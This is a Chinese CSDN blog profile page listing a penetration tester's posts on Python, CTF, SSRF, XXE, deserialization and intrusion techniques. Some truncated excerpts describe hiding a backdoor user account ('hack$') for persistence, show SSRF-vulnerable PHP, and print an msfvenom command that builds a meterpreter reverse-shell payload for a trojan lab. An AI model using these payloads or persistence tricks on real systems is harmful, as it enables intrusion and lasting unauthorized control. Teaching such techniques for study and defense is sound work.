渗透者:'
码龄4年
关注
提问 私信
  • 博客:80,463
    社区:4,154
    动态:131
    84,748
    总访问量
  • 45
    原创
  • 329,356
    排名
  • 2,696
    粉丝
  • 23
    铁粉

个人简介:现为攻防工程师,还在不断学习完善自己,期待大家与我一起不断变强

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:广东省
  • 加入CSDN时间: 2020-10-30
博客简介:

qq_52074678的博客

查看详细资料
个人成就
  • 获得149次点赞
  • 内容获得99次评论
  • 获得316次收藏
创作历程
  • 1篇
    2023年
  • 33篇
    2022年
  • 11篇
    2021年
成就勋章
TA的专栏
  • 漏洞分析学习
    付费
  • 漏洞复现学习
    付费
  • JAVA学习
    1篇
  • python学习
    7篇
  • ctf
    1篇
  • 渗透学习笔记
    2篇
  • CTF-pwn
    1篇
  • 网安工具配置
    4篇
  • 内网
    3篇
  • 漏洞挖掘
    4篇
  • SQL注入
    3篇
  • 前端
    1篇
兴趣领域 设置
  • 编程语言
    pythonjavaphpc语言javascript
  • 大数据
    sql大数据
  • 后端
    爬虫
  • 网络与通信
    网络安全
  • 操作系统
    linuxwindowsharmonyos
  • 网络空间安全
    安全系统安全web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

JAVA方法

java学习记录
原创
发布博客 2023.03.10 ·
532 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

Python Gui之tkinter(下)

python gui的学习基本完成开始开发渗透框架,下期将放出初版dos版本渗透框架
原创
发布博客 2022.12.04 ·
987 阅读 ·
0 点赞 ·
1 评论 ·
7 收藏

衡师11月月赛web题目wp

nuctf11月月赛团灭实验室的2道web题目的wp
原创
发布博客 2022.11.29 ·
1105 阅读 ·
1 点赞 ·
2 评论 ·
0 收藏

Python Gui之tkinter

为DNSscan写GUI页面的学习
原创
发布博客 2022.11.24 ·
919 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏

第一周pwn的题目

pwn的学习,有点好玩上瘾
原创
发布博客 2022.11.17 ·
505 阅读 ·
1 点赞 ·
3 评论 ·
0 收藏

IDEA快捷键和断点

IDAEA的一些快捷键总结
原创
发布博客 2022.10.25 ·
168 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

python学习第五天之循环结构

学python,自己写渗透工具
原创
发布博客 2022.07.03 ·
1447 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

python学习第四天之分支结构

学python,写自己的工具
原创
发布博客 2022.07.01 ·
452 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

网安基础之python学习第三天

python学习开发属于自己的渗透工具
原创
发布博客 2022.06.29 ·
927 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

网络安全之python学习第二天

学习python编写自己的武器
原创
发布博客 2022.06.29 ·
579 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

网安基础之python学习第一天

如何学习python直到编写自己的工具
原创
发布博客 2022.06.29 ·
659 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

内网横向移动之票据传递和哈希传递

内网横向移动
原创
发布博客 2022.06.21 ·
514 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

网络安全红队工具包总结

发布资源 2022.05.24 ·
docx

网络安全之权限维持(持续更新)

权限维持我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。渗透流程Windows权限维持1.用户维持隐藏用户维持(影子用户)隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到)$符号隐藏用户$符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持1.我们平时查看一个操作系统的几个用户的命令如下net user.
原创
发布博客 2022.05.22 ·
2081 阅读 ·
16 点赞 ·
6 评论 ·
33 收藏

网络安全之域信息收集(一)

域信息收集本机信息1.查询账户信息对当前主机的用户角色和用户权限进一步了解,判断是否需要提权DMZ普通用户需要提权到system用户,进行横向移动2.查询网络和端口信息根据目的主机的ip信息/网络连接/相关网络地址,初步确定网络状态win:ipconfig, netstat -anoARP路由表:arp -a路由表:route print查看dns缓存记录命令:ipconfig/displaydnslinux:ifconfig, netstat -
原创
发布博客 2022.05.18 ·
484 阅读 ·
3 点赞 ·
0 评论 ·
0 收藏

网络安全之SSRF漏洞

1.SSRF是什么<?phpfunction curl($url){ $ch = curl_init(); //设置URL和相应的选项 curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); //启用时会将头文件的信息作为数据流输出 //抓取URL并把它传给浏览器 curl_close($ch);}​$url = $_GET['url'];curl
原创
发布博客 2022.05.14 ·
888 阅读 ·
3 点赞 ·
0 评论 ·
1 收藏

网络安全之XXE漏洞

XXE漏洞1.XML基础知识eXtensible Markup Language可扩展标记语言用途配置文件交换数据XML内容xml声明XML格式要求 XML文档必须有根元素 XML文档必须有关闭标签 XML标签对大小写敏感 XML元素必须被正确的嵌套 XML属性必须被加引号 XML格式校验DTD(Document Type Definition)文档类型定义DTD内容之元素...
原创
发布博客 2022.05.13 ·
756 阅读 ·
2 点赞 ·
1 评论 ·
2 收藏

网络安全之反序列化漏洞

一·PHP类与对象类Class一个共享相同结构和行为的对象的集合<?php class MyClass{ var $var1; var $var2 ="constant string"; function myfunc ($arg1,$arg2){ [......] } [....]}?>类的实例$baidu = new Site;$kitty = new Cat;$benz = new Car;二
原创
发布博客 2022.05.11 ·
1265 阅读 ·
4 点赞 ·
3 评论 ·
2 收藏

网路安全之远程代码执行漏洞

一。什么是远程代码执行?远程代码执行:Remote Code Execute后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法远程命令执行:Remote Command Execute一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
原创
发布博客 2022.05.11 ·
3421 阅读 ·
9 点赞 ·
2 评论 ·
36 收藏

应急响应实战之木马实战

一.应急响应流程回顾二.木马攻击模拟实验(特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.)1.环境介绍攻击机kali:下载地址被攻击机(注意关闭防火墙)win10:下载地址:木马脚本源码msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
原创
发布博客 2022.05.09 ·
2164 阅读 ·
4 点赞 ·
7 评论 ·
9 收藏
加载更多